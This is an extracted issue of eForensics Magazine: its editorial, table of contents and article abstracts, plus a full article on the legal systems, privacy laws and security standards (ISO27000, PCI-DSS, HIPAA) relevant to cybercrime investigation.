Vous êtes sur la page 1sur 72

TEAM

Editor:
Joanna Kretowicz
joanna.kretowicz@eforensicsmag.com
Betatesters/Proofreaders:
Olivier Caleff, Kishore P.V., JohanScholtz,
Mark Dearlove, Massa Danilo, Andrew
J. Levandoski, Robert E. Vanaman, Tom
Urquhart, M1ndl3ss, Henrik Becker,
JAMES FLEIT, Richard C Leitz Jr
Senior Consultant/Publisher:
Pawe Marciniak
CEO: Ewa Dudzic
ewa.dudzic@software.com.pl
Marketing Director: Joanna Kretowicz
jaonna.kretowicz@eforensicsmag.com
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media Sp. z o.o. SK
02-676 Warszawa, ul. Postpu 17D
Phone: 1 917 338 3631
www.eforensicsmag.com

DISCLAIMER!
The techniques described in our articles
may only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or
consequent data loss.

Dear Readers,

e are pleased to present you our new OPEN issue CyberCrime and CyberSecurityof eForensics Magazine with
an open access, so that everybody interested in the subject is able to download it free of charge. This edition was carefully
prepared to present our Magazine to a wider range of readers. We
hope that you will enjoy reading our Magazine and subjects covered
in this issue will help you to stay updated and aware of all possible
pitfalls!
This particular edition will focus on the importance of legal and
regulatory aspects for the cybersecurity and cybercrime. You cannot overestimate importance and necessity of eForensic analysis
in a society where the Internet assumes the biggest and on-going
change in our lifetime. We use forensic analysis with the purpose
of crime investigation; but to do that effectively we should understand which laws and regulations have been broken. It is crucial to
understand what legal systems are existing, what are the types of
law, standards, types of cybercrime, the part of the computer system and, of course, how one can apply this knowledge.
Additionally, we will cover topic of CSA STAR Certification, an effective way of evaluation and comparison of cloud providers. Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing.
Many organizations are wary of cloud services due to apprehensions
around security issues. eForensics Magazine in cooperation with BSI
GROUP prepared an excellent workshop where you can master your
knowledge required to get CSA STAR Certification.
Whats more we added one article from our Packet Analysis workshop as a trial. More materials you can find under
http://eforensicsmag.com/course/packetanalysis/.
Read our new issue and get all the answers you were looking for!
We would like to thank you for your interest and support and invite
you to follow us on twitter and Facebook, where you can find the latest news about our magazine and great contests. Do you like our magazine? Like it, share it! We appreciate your every comment and would
be pleased to know what are your expectations towards our magazine!
Keep your information safe and do not forget to send us your feedback. Your opinion is important to us!
Valeriia Vitynska
eForensics Assistant Manager
and eForensics Team

www.eForensicsMag.com

CYBERCRIME AND CYBERSECURITY THE LEGAL AND REGULATORY


ENVIRONMENT
by Iana Fareleiro and Colin Renouf

05

ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY?


TARGETING ITALIAN BANK AND CUSTOMERS
by Davide Cioccia and Senad Aruch

14

AN OVERVIEW OF CLOUD FORENSICS


by Dejan Lukan

22

AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY


by David Hald, co-founder, chief relation officer

27

PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS


by Eric A. Vanderburg

29

UNDERSTANDING DOMAIN NAME SYSTEM


by Amit Kumar Sharma

37

In this article we will look at the environment in which eForensics exists; the legal and regulatory
regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to
investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which
laws and regulations have been broken. There are pitfalls in working out what laws and regulations
are in operation for a particular context; as what is illegal in one regime may not be in another, and
is it the law in the location of the system or the criminal that applies? The information here forms the
underlying legal knowledge in the CISSP certification and underpins the International Information
Systems Security Certification Consortium (ISC)2 knowledge.

During last few years banks, and different financial institutions, have been trying to protect or prevent fraud and cyber-attacks from accessing their customers credentials. They increased security and
login factors to avoid these kind of problems. One of these is the Two Factor Authentication (2FA),
used to help username and password to protect the bank account.

When discussing cloud forensics, were actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we
can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed up by physical or virtual hardware. In recent years,
there has been a significant increase on the use of virtualized environments, which makes it very
probable that our cloud service is running somewhere in a virtualized environment.

The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote
access to data stored offsite. Its convenience has made cloud services incredibly popular, both to
business and malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources
has never been more critical.

Almost every computer today is connected. Their communication with others takes the form of packets which can be analyzed to determine the facts of a case. Packet sniffers are also called as network
analyzers as it helps in monitoring every activity that is performed over the Internet. The information
from packet sniffing can be used to analyze the data packets that uncover the source of problems
in the network. The important feature of packet sniffing is that it captures data that travels through
the network, irrespective of the destination. A log file will be generated at the end of every operation
performed by the packet sniffer and the log file will contain the information related to the packets.

Domain Name System (DNS) DNS spoofing also referred to as DNS cache poisoning in the technical world is an attack whereinjunk (customized data) is added into the Domain Name System name
servers cache database, which causes it to return incorrecdata thereby diverting the traffic to the attackers computer.

www.eForensicsMag.com

CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATE


AND COMPARE CLOUD PROVIDERS
by John DiMaria

49

ROAD MAP TO CSA STAR CERTIFICATION OPTIMIZING PROCESSES,


REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTS
by John DiMaria

55

EFORENSICS CSA STAR CERTIFICATION SUPPLY CHAIN MANAGEMENT


USING CSA STAR CERTIFICATION
by John DiMaria

67

CONTINUOUS MONITORING CONTINUOUS AUDITING/ASSESSMENT OF


RELEVANT SECURITY PROPERTIES
by John DiMaria

70

Technological developments, constricted budgets, and the need for flexible access have led to
an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey
of C-level leaders in 52 countries which showed a unified concern over the accelerated rate that
companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure.

For centuries, the Swiss dominated the watchmaking industry and their national identity was somewhat tied to their expertise in the precision mechanics required to making accurate timepieces. Yet
the Swiss were so passionate about their expertise that they hesitated to embrace the new technology in watchmaking with batteries and quartz crystals. With Japans introduction of the quartz
wristwatch in 1969, the majority Swiss market share dropped from 80% at the end of World War II to
only 10% in 1974 (Aran Hegarty, Innovation in the Watch Industry, Timezone.com, (November 1996)
http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had invented the quartz watch but failed to see its potential.

When an organization adopts cloud services, it is in fact expanding its operations from a local or regional presence to a more global one. As a result, the corresponding organizational operations strategy needs to be adjusted to align with these changes. A more formal analysis of the supply-chain as
part of a more comprehensive due diligence review also needs to be considered (By definition, the
Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alliance to help enterprises assess the risk associated with a cloud computing provider).

While the Cloud Security Alliances (CSA) STAR Certification has certainly raised the bar for cloud
providers, any audit is still a snap-shot of a point in time. What goes on between audits can still be a
blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry
initiative which will enable real time monitoring of a CSPs security properties, as well as providing
continuous transparen-cy of services and comparability between services on core security properties (Source: CSA CTP Working Group Charter). This process is now being further developed by BSI
and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and the
Open Certification Frame-work as the continuous monitoring component, complementing point-intime assessments provided by STAR certification and STAR attestation. CTP is a common technique
and nomenclature to request and receive evidence and affirmation of current cloud service operating circumstances from CSPs.

www.eForensicsMag.com

CYBERCRIME AND
CYBERSECURITY
THE LEGAL AND REGULATORY ENVIRONMENT
by Iana Fareleiro and Colin Renouf

eForensic analysis becomes essential and necessary in a


society where the Internet assumes the biggest and on-going
change in our lifetime. It will take place as a result of a crime or
investigation. However, what is relevant and worth searching
for, or even what can be legally analyzed, depends on the
legal systems and regulations, the criminal and, maybe, even
customers or users affected.

What you will learn:


In this article we will look at the environment in which eForensics exists;
the legal and regulatory regimes in
which systems and cyber criminals
operate. We perform forensic analysis on systems to investigate a crime
and hopefully prosecute a criminal;
but to do that we need to understand which laws and regulations
have been broken. There are pitfalls
in working out what laws and regulations are in operation for a particular
context; as what is illegal in one regime may not be in another, and is it
the law in the location of the system
or the criminal that applies? The information here forms the underlying
legal knowledge in the CISSP certification and underpins the International Information Systems Security
Certification Consortium (ISC)2 body
of knowledge.

he laws broken may be existing laws pertaining to theft or threats of violence where the computer systems are central, or the computer system
may be on the periphery of the crime, or it may be specific information
systems or computer privacy laws and regulations that are relevant; possibly
even a combination of all of them. These laws and regulations may conflict,
and what is illegal in one country or region may not be illegal in another.
As a cyber security expert we need to understand what we are aiming to
prove and what data we can legally investigate before we begin our work.
In addition to existing laws within the legal systems at work, specific cyber laws were created to protect individuals, companies and governments
against cyber crime; which can be divided in three categories:
Computer-assisted crime is where a computer is used as a tool to assist
on committing a crime,
Computer-targeted crime happens when a computer was the main target
and victim of an attack,
The last category includes situations where the computer happens to be
involved in a crime; but is not the attacker or attackee; and is peripheral
to the crime itself.
These categories were created to facilitate the law enforcement of cyber
crimes. Laws can be general and include numerous scenarios, instead of the
need to create specific laws for each individual case.

www.eForensicsMag.com

The idea is to use the existing laws for any crime where possible, allowing an easier understanding of
the basis for prosecution for all people involved, including the judge and jury, who can then provide the
verdict and sentence based on existing guidelines and standards.
The downside of introducing specific cyber laws is that, for example, when companies are attacked
they just want to ensure that the vulnerability exposed is fixed and avoid any embarrassment that would
adversely affect the company reputation. Even when information as to an attack leaks out companies do
not seem interested on spending time and money in courts; preferring to minimize the time of embarrassment. This is the main reason as of why cyber criminals are unpunished and easily get away with such illegal actions. Not many companies wish to be known as victim of a cyber attack since that can adversely
influence customer confidence and scare away investors

LEGAL SYSTEMS

There are essentially four different models of legal systems; civil law, common law, religious law, and
customary law.

CIVIL LAW

In civil law, employed by most countries, a legislative branch of the government develops and documents statutes and laws, and then a judiciary has some latitude for interpreting them. The legislation is
prescriptive so legal precedence, whilst existing, has little force. In some such systems, such as that derived from Roman law or the later Napoleonic code, the judge assesses the proof as a measure of guilt
of the criminal.

COMMON LAW

This system, used in the UK, US, Canada, Australia and other former British colonies amongst others,
is often derived from the English legal system. A legislative branch of government still produces statues
and laws, but great emphasis is placed on judicial interpretation, precedent and existing case law; which
can even override and supersede the legislation and statute if a conflict is found to occur. Thus, time is
important in this system as judicial interpretation may develop and traditional interpretation of custom
and natural law acts as a basis for the system. The judiciary and its interpretation of the legislation and
precedent in existing case law has a greater role in this system than in the civil law system. In the English legal system and its derivatives the role of the jury to interpret the evidence in assessing the burden
of proof is common.

RELIGIOUS LAW

In religious law, such as Sharia Law adopted by several Islamic countries and groups, religious texts and
doctrine provide the basis for the legal system, rather than separate statute and legislation. Here the
given target religion is accepted by the majority of the people or their rulers; such that they essentially
become laws to which the people abide. The laws enforced may be interpreted from the appropriate religious texts by religious leaders; such as imams or ayatollahs.

CUSTOMARY LAW

In this existing regional customs accepted by the majority of the people over a period of time provide
the basis for the legal system to the extent that they essentially become laws to which the people abide.
These customs may later be codified to some extent. This model is seen in the other legal models in
duty of care and best practice interpretation as what would be expected of a reasonable man as a
measure; such as in the tort law of the civil law branch of common law.

TYPES OF LAWS

Within common law itself, civil law plays a part, alongside criminal law, tort law and administrative law.
As groups of countries collaborate, such as in the European Union (EU), the combinations become more
complex, but the types of law are common at the core due to the prevalence of the English legal system
and its derivatives in the UK, US, Australia, etc.

CRIMINAL LAW

In criminal law the aim is law and order of the common citizen and deterrence of criminals when punishing offenders; so the victim of the crime is considered society itself from the view of prosecution,
even though the actual victim may be a person or persons. Hence, the existence of the Crown Prosecution Service (CPS) in the UK for pursuing the criminal through the courts under criminal law with
6

www.eForensicsMag.com

an aim to remove the offender from affecting society. The criminal is incarcerated or even deprived of
his or her life under some circumstances so there is an emphasis on burden of proof being beyond
reasonable doubt.

CIVIL LAW

Here the individual has been wronged and seeks legal recourse in terms of damages from a civil defendant, rather than loss of liberty, with the evidence essentially reduced from beyond all reasonable doubt
to a likelihood known as a preponderance, i.e. more likely than not. The damages for the wrongdoing
may be statutory as prescribed by law, compensatory to attempt to balance loss or injury, or punitive to
discourage and deter from future legal violation.

TORT LAW

This is a branch of civil law related to wrongdoing against an individual measured against best practice
or duty of care, where the action taken or negligence of responsibility of an individual or organization
is considered to be outside the bounds expected of behavior of a reasonable, right thinking, or prudent
man; and in this relates back to custom, and often may change over time. Here again, the burden of
proof is on preponderance of the evidence weighing against the defendant. This is the largest source of
lawsuits and damages under major legal systems.
This is particularly important in the realms of cyber security laws. In protecting customer data the
Prudent Man Rule is applied to set the bar for duty of care in what processes, infrastructure and practices a right thinking person would consider necessary as a minimum. If a business is seen to be below
that bar of expectation then the organization and business stakeholders are considered negligent in providing the necessary due care to protect its customers, assets and business stakeholders.
A company has to exercise due diligence continuously in reviewing its own and third party partners
and processes to ensure that the necessary standard of due care is being met. As the technologies and
threats in the industries adapt all of the time, due diligence ensures the minimum bar changes accordingly. Whenever a new third party is brought into a company processes the necessary due diligence in
assessing that party for past criminal history, threats and their own due care protection standards and
due diligence processes must be performed.

CONTRACT LAW

Agreements between companies and individuals can be broken, whether verbal or documented in writing, and damages for wrongdoing can occur. This is again a type of civil law.

ADMINISTRATIVE AND REGULATORY LAW

This covers governance, compliance and regulatory laws relating to government and government agencies. Governments enact these laws with less influence from the judiciary. Compliance laws, such as
Sarbannes-Oxley, come under this branch of the legal system.

INTELLECTUAL PROPERTY LAWS

One of the targets in many cyber crimes is stealing intellectual property, so companies go to great technical lengths and legal lengths to protect it. Whilst intellectual property isnt physical in nature, companies require creativity and then investment to capitalize on it. It takes a number of forms from trademark,
copyright, licenses, patents and even simple trade secrets that a company entrusts to its staff.
A trademark is a name, image or logo for a brand that is used in marketing and is associated with
a brand by its customers and competitors; and it may be formally registered or unregistered. Whilst stealing the logo itself is not usually a major criminal target, in phishing attacks a log may be used to misrepresent the cyber criminals web site as that of the company owning the brand.
Copyright is the right of an owner of a musical, artistic or literary work to own, duplicate, distribute and
amend that work themselves. Often cyber criminals will duplicate a copyrighted work and sell it or provide it for download as their own property.
A patent is a legal agreement protecting the use of an idea or invention such that the patent holder
has exclusive rights on the use and licensing of that idea for a period of time covered by the patent.
Some rogue nations and cyber criminals will ignore the patent and use the invention or idea as their own,
7

www.eForensicsMag.com

and legal recourse is then required by the patent holder to obtain compensation. A license is a contract
between a vendor and consumer or business to use software within the bounds of an end user license
agreement, and not duplicate, modify, redistribute or sell on that software.
A trade secret is proprietary information belonging to a business in a competitive market that its staff
and third parties should not divulge, and is often subject to a non-disclosure agreement (NDA) that is
a contract between the business and a third party or employee to not divulge that secret. The business
must exercise due care to protect that trade secret.

DATA PRIVACY LAWS

With the rise in cyber crime and stealing of customer data being a regular objective of the cyber criminal,
most countries and states introduced their own data protection laws. These cover the processes and expected standard behavior for protecting data, but often also include clauses as to where that data can be
located and what countries and under what circumstances it can be shared.
In the US the Privacy Act of 1974 protects the data held by the US government on its citizens, and how
it is collected, transferred between departments, and used; with individuals having legal recourse on being able to request access to the data held about them, with national security providing the main limitation to that access. Similarly, in the European Union the EU Data Protection Directive sets the boundaries on the collection and flow of personal data between member nations; with a fine line between the
needs of commerce between different member nations and the privacy of the individual. The EU principles are considered more stringent than those of the US, so the EU-US Safe Harbor legal framework
allows that EU data to be shared with US organizations if they adhere to the more stringent EU Data
Protection Directive principles.
The EU Data Protection Directive principles are:



Individuals must be notified how their personal data is collected and used
Individuals must be able to opt out of sharing their data with third parties
Individual must opt in to shared sensitive personal data
Reasonable protections must be in place to protect the personal data

This latter rule brings in the duty of care legal measure.


The United States Code Section 1030 Title 18, usually known as the Computer Fraud and Abuse Act
defines the environment in which systems are considered to have been attacked in government and commercial organizations and the recourse against the criminal. This was amended by the Patriot Act 2001
as a response to the September 11th attacks to allow easier implementation of wiretaps by law enforcement agencies and easier sharing of data between those agencies, along with more stringent punishment
for damaging a protected system from the original act or dealing with individuals on the sanctions list.
The Identity Theft Act further amends the original act to provide additional protection for the individual.

STANDARDS

International bodies, industries, and some groups of companies may produce their own standards to
which individuals and companies may comply, and claiming such compliance is a requirement for taking
part in that industry from a financial or regulatory perspective, or may be required as part of a contract.
So, companies supporting the payments with debit and credit cards usually have to adhere to the PCIDSS standards mandated by the card industry vendors, or health service vendors in the US must deliver
to HIPAA data security standards for patient data as mandated by US administrative law.
In the early days of networked IT (1995) the British Standards Institute started to develop BS7799 that
outlines how an information security management system should be designed, built and maintained;
with guidelines on what is necessary in the forms of policies and processes; along with the technologies
necessary to holistically protect sensitive information from the physical, to the network, to the electronic.
From this the ISO/IEC 27000 standards were developed; using an iterative process where objectives
and plans are formed (Plan), then implemented (Do), the results measured to see if the objectives were
met (Check), and then amendments made as necessary (Act) the whole iterative process is known as
the PDCA cycle.

www.eForensicsMag.com

ISO27000

The ISO and International Electrotechnical Commission (IEC) standards bodies jointly issue the ISO27000
Information Technology Security Techniques family of standards for information security management
best practice for risks and controls; which was, as mentioned, derived from the earlier BS7799 British
Standard and the later ISO/IEC 17799 standard. These bodies have a committee called Joint Technical
Committee 1 (JTC 1) Subcommittee 27 SC27 that meets twice a year to consider and ratify the standards and amendments to provide the information security management system (ISMS), with the 27000
base standard providing an overview of the complete family of policy-oriented standards and the vocabulary used throughout. The individual standards are as follows:
ISO/IEC
Description
Standard
27000
27001
27002
27003
27004
27005
27006
27007
27008
27010
27011
27013
27014
27015
27017
27018
27019
27031
27032
27033
27033-1
27033-2
27033-3
27033-5
27034-1
27035
27036
27036-3
27037
27038
27039
27040
27041
27042
27043
27799

Information security management systems Overview and vocabulary


Information security management systems Requirements
Code of practice for information security management
Information security management system implementation guidance
Information security management Measurement
Information security risk management
Requirements for bodies providing audit and certification of information security management systems
Guidelines for information security management systems auditing
Guidance for auditors on ISMS controls
Information security management for inter-sector and inter-organizational communications
Information security management guidelines for telecommunications organizations based on ISO/IEC 27002
Guideline on the integrated implementation of ISO/IEC 27001 and ISO/IEC 20000-1
Information security governance
Information security guidelines for financial services
Information security management for cloud systems
Data protection for cloud systems
Information security management guidelines based on ISO/IEC 27002 for process control systems specific
to the energy utility industry
Guidelines for information and communication technology readiness for business continuity
Guideline for cybersecurity
IT network security, a multi-part standard based on the ISO/IEC 18028:2006
Network security Part 1: Overview and concepts
Network security Part 2: Guidelines for the design and implementation of network security
Network security Part 3: Reference networking scenarios Threats, design techniques and control issues
Network security Part 5: Securing communications across networks using Virtual Private Networks (VPNs)
Application security Part 1: Guidelines for application security
Information security incident management
Information security for supplier relationships
Information security for supplier relationships Part 3: Guidelines for information and communication
technology supply chain security
Guidelines for identification, collection, acquisition and preservation of digital evidence
Specification for redaction of digital documents
Intrusion detection and protection systems
Guideline on storage security
Assurance for digital evidence investigation methods
Analysis and interpretation of digital evidence
Digital evidence investigation principles and processes
Information security management in health using ISO/IEC 27002

www.eForensicsMag.com

These arent laws, but many contracts will insist that participants adhere to the complete body of the
standard, or its individual components. Adherence to the standard or its components can also be used
as a quality measure, and can act as a selling point; and in negotiations this can be important. Therefore,
this standard can appear in the enacting of contract law.
The individual components cover investigation and forensic analysis, as well as relationships with third
parties. However, one of the key areas where the standard impacts the legal environment for cyber security is in the influence it has had on other standards and regulations that can be enforced as the cost
of doing business in some industries, e.g. PCI-DSS in companies involved in credit card sales. When
evaluating compliance or where criminal responsibility is being assessed ISO/IEC27000 provides a basis by which what is expected of the reasonable man can be measured from a legal perspective.

INFORMATION TECHNOLOGY INFRASTRUCTURE LIBRARY (ITIL)

ITIL, like the foundations of ISO/IEC27000 was developed by the UK government, with an aim of standardizing and documenting service management and aligning IT with the business with a common language. IT should provide good customer service to the business it serves. Whilst not providing a security
framework it does cover support, change and maintenance processes and all of the foundations for business continuity and disaster recovery management with great strength in incident management.
It covers supplier management, service level management, service catalog management, availability
management, incident management, event management, problem management, change management,
knowledge management, release and deployment management, service testing and validation, and the
requirements of a configuration management system. It has processes for service design, service operation and service transition. Across all of this is continual process improvement as a result of service
reporting and service measurement. At the core of ITIL is the concept of IT as a service.
Again, ITIL is referenced in contracts and often used as a selling point, but in the legal world outside of
contracts is more useful as a measure of the expectations for the reasonable man.

CONTROL OBJECTIVES FOR INFORMATION AND RELATED TECHNOLOGIES (COBIT)

This was produced by the Information Systems Audit and Control Association in 1996 as a general
framework of processes, policies, and governance for the management of IT as a whole, not just security; and the current version aligns with ITIL and ISO27000 standards to provide a full framework and
model for IT as the basis of a capability maturity model.
It splits IT into domains; Plan and Organize, Acquire and Implement; Deliver and Support; and Monitor
and Evaluate; and across these includes a framework, process descriptions, control objectives, management guidelines, and maturity models.
Whilst ISO27000 provides high level guidelines and processes, the COBIT model contains specific details, such as for user access management and compliance, and how to work with third parties; with a
lot of helpful security details particularly in the Plan and Organize, and Acquire and Implement domains;
with the processes heavily emphasized in the other two domains.
Again, as in ISO/IEC27000, COBIT is often referenced as a selling point or in contracts, but also provides specific processes that tie up with the reasonable man assessment from a legal perspective.

PAYMENT CARD INDUSTRY DATA SECURITY STANDARD (PCI-DSS)

The major card companies (e.g. Visa, MasterCard, American Express, JCB, etc) got together in 2006 to
come up with a set of standards for data security that could be measured and enforced for companies
wishing to participate in payment card processing. Annually a Qualified Security Assessor (QSA) creates
a report on compliance to the standards that are split into 12 requirements in 6 groups.

10

www.eForensicsMag.com

Control Objectives

PCI-DSS Requirements

Build and Maintain a Secure


Network

1. Install and maintain a firewall configuration to protect cardholder data

Protect Cardholder Data

3. Protect stored cardholder data

2. Do not use vendor-supplied defaults for system passwords and other security
parameters.
4. Encrypt transmission of cardholder data across open, public networks

Maintain a Vulnerability
Management Program

5. Use and regularly update anti-virus software on all systems commonly affected
by malware
6. Develop and maintain secure systems and applications

Implement Strong Access Control 7. Restrict access to cardholder data by business need-to-know
Measures
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data
Regularly Monitor and Test
Networks

10. Track and monitor all access to network resources and cardholder data

Maintain an Information Security


Policy

12. Maintain a policy that addresses information security

11. Regularly test security systems and processes

The aim of the PCI-DSS standards is to ensure consistency across the card payments industry in the
way that customer details and the necessary card data useful for making payments is protected and handled. It covers requirements for technology, processes and the relationships with the business and the
staff involved. From a customer perspective this acts to protect customers in that companies adhering to
the PCI standards can be trusted to look after the data and later fraud would be unexpected. Reviews of
continued compliance is required by any company adopting PCI; with the QSA making an assessment
and recommendations for any areas of improvement required.
So, adherence to PCI is usually contractual, which is how it relates to the law; yet again anyone dealing with payment card data would be expected to follow the recommendations within the standard and,
thus, fits with the reasonable man assessment within legal frameworks. Whilst US federal law doesnt
mandate companies adhere to PCI-DSS if dealing with card data, the laws in some states within the US
and elsewhere do refer to it so it is likely to become the law in the future. MasterCard and Visa require
service providers and merchants to be validated for PCI-DSS compliance, and banks must be audited,
whereas validation isnt mandatory for all entities.

HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT (HIPAA)

The HIPAA act is a US federal law that covers many areas, but part of it also includes standards for data
privacy that overlap with the data privacy laws in some countries and also tie back to the reasonable
man rule in the gray area between law and standard. Therefore, many information security certifications (CISSP), and standards reference the act and its standards worldwide. The objective of the HIPAA
regulatory framework was to provide a secure way for the health insurance of US citizens to be shared
between providers when changing or losing jobs, ensuring the citizens not only had any confidential personal information or medical condition information protected physically, but also that the policies were in
place to ensure their health insurance benefit position was maintained.
The act is in two parts. The first part (Health Care Access, Portability, and Renewability) covers the
policies for which US citizens maintain their health insurance across providers, what their entitlement
is when switching providers; and as such isnt applicable to the information security realm at the detail
level. The second part (Preventing Health Care Fraud and Abuse; Administrative Simplification; Medical
Liability Reform) and its details on data privacy is more relevant to information security professionals,
and it is here than granular standards exist and there is an overlap with data privacy laws elsewhere.
The Privacy Rule and Security Rule subsections are key here, and the latter includes the standards. The
Security Rule is split into Administrative Safeguards, Physical Safeguards and Technical Safeguards
and includes standards for encryption, checksums, etc as well as risk management and risk assessment
processes. In interpretation of adherence to these process standards the reasonable man rule is again
brought into use from a legal perspective as the prescriptiveness of the standards is open to interpretation and applicability at many levels.
11

www.eForensicsMag.com

NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST)

This is not like the other paragraphs here in that it refers to a standards issuing body as a whole, like
the ISO/IEC or BSI bodies referenced earlier; but is mentioned due to its issuing of very detailed build,
hardening, and usage standards for IT and security that are often referenced by other standards (e.g. it
is often used as best practice build and configuration standards for PCI-DSS compliance) and again act
as a yardstick for the reasonable man rule in assessing whether a reasonable attempt was made to
secure data.
The NIST maintains an Information Technology Portal with a standard Cybersecurity Framework, Computer Security Resource Centre, and other documentation and groups: http://www.nist.gov/.
The US government maintains a standard configuration document for Windows 7 and Red Hat Enterprise Linux 5 on this site that shows how builds should be done. Of more interest beyond the reasonable
man debate are the standards and guidelines for eForensic analysis.

THE PART OF THE COMPUTER SYSTEM

The computer may be a key part of the criminal or civil act, as in the breaking of cyber laws; or may be a
peripheral part of the crime itself, as in electronic fraud; or may just be a part of the evidence gathering
to build a picture of the crime or criminal. The legal systems and industry standards have specific definitions for the role of the computer system in these contexts.
Where the computer plays a role as a tool of the criminal, but the crime is general even though the
computer is central to the commission of the crime, this is known as a computer as tool scenario. Stealing credit card information to commit fraud or penetrating a system to steal company intellectual property
secrets would be examples of this scenario.
Where the crime has the computer as the primary target or victim of the crime, particularly where information or cyber security laws are broken, are computer system as target scenarios. Hacking to install malware, deployment of computer viruses, and distributed denial of service attacks would fall into
examples of this scenario.

TYPES OF CYBER CRIME

A crime being forensically investigated may be an existing law resulting from theft or a violent act, so
fraud using a computer is still fraud and a threat of violence online is still a threat of violence, and a computer could be used in hacking to bring about violence or death.
It may also be investigation is required for a specific cyber crime that has been broken pertaining only
to the use of a computer, such as hacking or denial of service for fun or political motivation.
Finally regulations may be broken using a computer that can be considered legal and contractual; so
a system built to Payment Card Industry-Data Security Standards compliance may be a key term in a
contract so non-compliance to the regulations leads to a contractual violation.

HOW DO WE APPLY THIS KNOWLEDGE?

To perform forensic analysis we obviously first have to protect the evidence, but what evidence we are
allowed to access and what is useful requires first understanding which laws are believed to have been
broken, the role of the computer, and what laws are in place for the analyst doing the work. It isnt necessarily legal to perform forensic analysis and access personal data for a potential criminal without breaking a privacy law.
The most difficult tasks are when the criminal is in one country or state, the target system is in another,
the victim in yet another, and multiple countries have been traversed. Even within a single country like
Australia or the United States different laws can apply state to state. The complexity is why so many
computer related crimes remain unprosecuted, along with the shame for a company in having been
breached. The key to applying the legal knowledge before doing what is needed to achieve a prosecution
is identifying what is common between the states and countries involved, and new international frameworks of cooperation are being drawn up to assist in this.

12

www.eForensicsMag.com

INTERNATIONAL LEGAL COOPERATION IN CYBER SECURITY

The increase in cyber crime and the need for coordinated anti-terrorist cooperation across state and
international boundaries has led to frameworks being drawn up, such as the Safe Harbor cooperation between the EU and US. More international work between governments is currently underway to
make this easier, not initially due to basic cybercrime, but the need to combat terrorism and terrorist
funding. The trick is to identify a common subset on protection against fraud and personal data and
work out from that to identify the maximum commonality between all legal state or national entities,
and then aim to prosecute in the area where the criminal is most likely to be sentenced; remembering
that avoiding breaking the law during the analysis in any of the state or nations during the forensic investigation is a necessity.
Post-graduate degrees specifically covering international cyber crime and security are beginning to
spring up; such as that being studied by the authors. Personal experience has shown that the specific
state knowledge of experienced lawyers can come to nothing in this internationally complex area, so
specializations in this niche area are likely to grow in importance.

THE INTERNATIONAL, FEDERAL AND STATE INTERPRETATION WHICH LAWS APPLY?

In determining which laws apply to a particular scenario there are four separate considerations that may
include different states, countries, and even international groups, such as the EU. When a possible crime
occurs involving a computer and data in the modern world, to work out which laws apply, we must consider the location of the cyber criminal, the location of the system being attacked, the location of any victims, and the locations over which the data forming the attack occurs.

CRIME APPLICABILITY AND INVESTIGATION AN EXAMPLE

Consider a mobile phone payments application for purchasing foreign currency for international travellers. The user is from the UK, lands in Singapore, but uses a cellphone tower in Malaysia to enact transactions hosted on a system in Australia. Which laws apply? In this example, certain compliance restrictions on checking transactions in Malaysia and Singapore may mean that the application should use
geolocation and cell tower identification to shut down to avoid an impossible legal situation. In forensic
analysis after the fact where access to personal data might be restricted where the analysis is performed,
this gets even more complex.
So, if a crime has been deemed to have occurred consider the issue of identifying which country the
crime has been committed in. Then assess which Police or agencies will prosecute. However, taking the
example of the different privacy acts enforced under the EU, US, Australian, New Zealand, laws etc, and
even sharing the evidence with the Police forces can be an issue, because that the personal data of the
individual can only be seen by authorised agents of their own country. Often its best to segregate the data and even store it in location in the given country (such as required for many China financial systems)
to avoid the complexities and gives the best chance for prosecution of the criminal.

WHAT HAVE WE LEARNED?

We have looked at the basic types of legal system and how they differ in different countries, and the different types of laws and regulations that can be broken with different results for the defendant or perpetrator.
We have then applied this to examples using computers to see how complex the environment is under
which cyber security experts must operate to investigate a crime and see what laws and regulations apply.
ABOUT THE AUTHORS

Colin Renouf is a long standing IT worker, inventor, and author; currently an Enterprise Solution Architect in the finance industry, but having worked in multiple roles and industries over the period of decades. An eternal student, Colin has studied varied
subjects in addition to IT. Having written and contributed to several books and articles on subjects ranging from IT architecture,
Java, dyslexia, cancer, and security; he is even referenced on one of the most fundamental patents in technology and has been
involved in the search for the missing MH370 aircraft. Colin has two incredibly smart and intelligent children; Michael and Olivia;
who he loves very much. He would like to thank his co-author and best friend Iana; her lovely sister Taina, brother Tiago, mother
Marciaa, and father Jose. What more is there to say, but thank you Red Bull.
Iana Fareleiro works as an analyst as part of a fraud and compliance team for a payments card business and is studying a postgraduate cybersecurity and cybercrime course. Originally from Brazil, and having lived in Mozambique, South Africa and Zimbabwe, and eventually Portugal; she now lives in the UK in Peterborough. She is a movie buff of old, and a scientist at heart who
gets great enjoyment out of intellectual argument with like-minded individuals. She would like to thank her sister Taina, brother
Tiago, mother Marciaa, and father Jose; and boyfriend Luis.
13

www.eForensicsMag.com

ARE 2 FACTOR
AUTHENTICATIONS
ENOUGH TO PROTECT
YOUR MONEY?
